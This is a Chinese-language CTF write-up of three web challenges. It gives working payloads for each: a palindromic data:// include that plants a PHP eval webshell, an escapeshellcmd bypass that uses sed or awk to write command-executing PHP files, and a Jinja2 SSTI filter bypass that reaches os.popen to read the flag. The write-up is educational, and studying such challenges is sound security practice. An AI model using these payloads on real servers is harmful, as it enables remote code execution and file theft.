web签到
题目代码
error_reporting(0);
highlight_file(__FILE__);
$file = $_POST['file'];
if(isset($file)){
if(strrev($file)==$file){
include $file;
}
}
strrev函数,将字符串倒序。让倒序的字符串等于它本身,最后进行一个包含。我们可以用data伪协议来传一句话木马进去,payload为
?1=system('cat /f*');
file=data://text/plain,<?php eval($_GET[1]);?>>?;)]1[TEG_$(lave php?<,nialp/txet//:atad
只需满足逆序等于它本身即可。
easyPHP
看题目代码
error_reporting(0);
highlight_file(__FILE__);
$cmd = $_POST['cmd'];
$param = $_POST['param'];
if(isset($cmd) && isset($param)){
$cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
shell_exec($cmd);
}
escapeshellcmd()函数是会对 &#;
|*?~<>^()[]{}$`, \x0A
和 \xFF
。 '
和 "
仅在不配对儿的时候被转义,目的就是为了不让用户输入的恶意指令发挥作用。
escapeshellarg()将用户输入的字符串整合为一个字符串,目的是为了避免多参数注入。
shell_exec()函数,只会在后端执行命令,不会把执行结果返回给用户,无回显。
这里就要学到两个命令了。
sed
一个是sed命令。在没有任何语句的时候,它会把源文件的内容直接输出出来。我们可以利用sed正则表达式来修改shell_exec()函数并且保存为另一个文件中,(sed 正则表达式 - sed 基础教程 - 简单教程,简单编程)
先上payload:
cmd=sed¶m=/esca/d;s/shell_exec/system/g;w 123.php
/esca/是为了匹配escapeshellcmd()和escapeshellarg()函数,用d参数把他们删除。s参数是为了将shell_exec()函数替换为system函数,g是全局替换标志。最后将它保存在123.php文件中。
那我们直接访问123.php。
发现代码确实改变了。那接下来就直接可以命令执行找到flag了。 最终payload:
cmd=cat /f*¶m=1
awk
另一个是awk命令。就是将执行的命令语句输入到文件中并执行。因为是没有回显的,所以可以写入文件里,然后访问查看。就比如我输入cmd=awk¶m={system("whoami>1.php")},查看1.php,
那么就可以直接rce了。最终payload:
cmd=awk¶m={system("cat /f*>1.php")}
相关知识链接:shell编程之awk命令详解 - QuincyHu - 博客园 (cnblogs.com)
姻缘测试
查看源代码,通过/source找到hint。
def is_hacker(string):
"""
整那些个花里胡哨的waf有啥用,还不如这一个,直接杜绝SSTI
"""
if "{" in string and "}" in string :
return True
else:
return False
单看这个hint还真不知道是啥意思。试着找注入点,注入点应该就是写姓名的地方。输入{{7*7}}返回hacker,那应该是过滤了{}字符。
在boy_name中写入&girl_name字符串,那么就不满足boy_name或者说girl_name参数同时存在{和}字符的情况。可以成功绕过限制了。
直接上payload:
result?boy_name={{'&girl_name='.__class__.__base__.__subclasses__()[81].__init__.__globals__.__import__("os").popen("cat%09/flag.txt").read()}}
目前还不清楚其他payload构造思路。
最后一题以后再填坑。